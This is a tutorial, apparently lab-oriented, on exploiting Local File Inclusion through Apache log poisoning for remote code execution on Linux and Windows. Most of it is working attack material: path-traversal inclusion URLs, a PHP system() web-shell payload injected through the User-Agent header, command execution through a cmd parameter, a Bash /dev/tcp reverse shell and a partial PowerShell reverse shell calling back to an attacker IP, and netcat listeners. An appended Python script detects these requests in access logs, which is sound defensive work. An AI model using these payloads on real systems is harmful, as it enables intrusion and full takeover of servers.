Exploiting LFI with Log Poisoning

Published on March 13, 2025


In this tutorial, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) using log poisoning. This technique involves injecting malicious code into server logs, which can then be included and executed via LFI. We'll cover both Linux and Windows exploitation.

Linux Exploitation

1. Identify Log File Location

Apache logs are typically located at /var/log/apache2/access.log. We can retrieve the log file using LFI, provided the web server process has read permission on it:

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log

2. Poison the Apache Log File

Apache writes the User-Agent header of every request verbatim into the access log. We set it to a PHP payload so that the tag becomes part of the log file and runs when the file is included:

User-Agent: <?php echo system($_GET['cmd']); ?>

3. Execute the Malicious Code

Once our payload is in the log file, we include it via LFI; PHP evaluates the included file, so the tag runs with the command passed in cmd:

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=id

4. Getting a Reverse Shell

To gain full control, we use a Bash reverse shell:

bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

URL encode before injecting:

bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

Start a listener:

nc -nvlp 4444

Windows Exploitation

1. Verify the LFI Vulnerability

Test if the application has LFI by including win.ini:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../windows/win.ini

If the file is displayed, LFI is confirmed.

2. Identify the Apache Log File Path

On XAMPP, Apache logs are typically stored at:

C:\xampp\apache\logs\access.log

Access the log file via LFI:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../xampp/apache/logs/access.log

If log content is visible, proceed to log poisoning.

3. Poison the Apache Log File

Inject a malicious PHP payload via User-Agent:

curl -A "<?php echo system($_GET['cmd']); ?>" http://192.168.50.193/

The payload is now stored in the log and will execute when the log file is included via LFI.

4. Execute Commands

Execute the dir command via LFI:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../xampp/apache/logs/access.log&cmd=dir

Alternative Solutions

If spaces break your command, replace them with %20:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../xampp/apache/logs/access.log&cmd=dir%20C:\xampp\htdocs

If cmd is blocked, use PowerShell:

powershell%20-Command%20"Get-ChildItem%20C:\xampp\htdocs"

5. Obtain a Reverse Shell

To gain full control, use PowerShell to create a reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);..."

Start a Netcat listener on your machine:

nc -nvlp 4444
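As an added detection example (not part of the original tutorial), the script below parses Apache combined-format access log lines and flags both stages of the technique described in the Linux and Windows sections: a PHP open tag arriving in the User-Agent or Referer header (poisoning), and a page parameter carrying path traversal toward a log file together with a cmd parameter (inclusion). The log lines are constructed to mirror this page's requests; the function names and finding tags are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)  # <?php or short <?= open tag
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")                   # ../ or ..\ (after URL decoding)
LOG_PATH_RE = re.compile(r"(?:access|error)\.log", re.IGNORECASE)

# Constructed sample lines mirroring the requests in this tutorial (not real traffic).
SAMPLE_LOG = [
    # stage 1, poisoning: PHP code sent as the User-Agent header
    '192.168.119.3 - - [13/Mar/2025:10:15:32 +0000] "GET / HTTP/1.1" 200 1234 "-" '
    '"<?php echo system($_GET[\'cmd\']); ?>"',
    # stage 2, inclusion: traversal to the Linux access log plus a cmd parameter
    '192.168.119.3 - - [13/Mar/2025:10:16:01 +0000] "GET /meteor/index.php?page='
    '../../../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 5678 "-" "curl/8.5.0"',
    # same against XAMPP on Windows, with URL-encoded slashes
    '192.168.50.1 - - [13/Mar/2025:10:20:11 +0000] "GET /meteor/index.php?page='
    '..%2F..%2F..%2F..%2Fxampp%2Fapache%2Flogs%2Faccess.log&cmd=dir HTTP/1.1" 200 9012 "-" "Mozilla/5.0"',
    # benign request, must not fire
    '10.0.0.5 - - [13/Mar/2025:10:17:45 +0000] "GET /meteor/index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def analyze_line(line):
    """Return the finding tags for one combined-format log line ([] when clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed_line"]
    findings = []
    # Stage 1: a PHP open tag inside a header that Apache copies into the log.
    for field in ("ua", "ref"):
        if PHP_TAG_RE.search(m.group(field)):
            findings.append("php_tag_in_" + field)
    # Stage 2: traversal or a log-file name in any query parameter (parse_qs URL-decodes values).
    parts = m.group("req").split(" ")
    params = parse_qs(urlsplit(parts[1] if len(parts) > 1 else "").query, keep_blank_values=True)
    for name, values in params.items():
        if any(TRAVERSAL_RE.search(v) for v in values):
            findings.append("traversal_in_" + name)
        if any(LOG_PATH_RE.search(v) for v in values):
            findings.append("log_path_in_" + name)
    if "cmd" in params:
        findings.append("cmd_parameter")
    return findings

def scan(lines):
    # Map line index -> findings for every line that triggers at least one detection.
    return {i: f for i, line in enumerate(lines) if (f := analyze_line(line))}
```

Run `scan(SAMPLE_LOG)` to see lines 0 to 2 flagged and the benign line ignored; on a real log, feed the file's lines in and alert on any line that returns both traversal and cmd tags.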

Conclusion

By poisoning log files and leveraging LFI, we achieved remote code execution on both Linux and Windows. Understanding log file locations and encoding techniques is crucial for successful exploitation.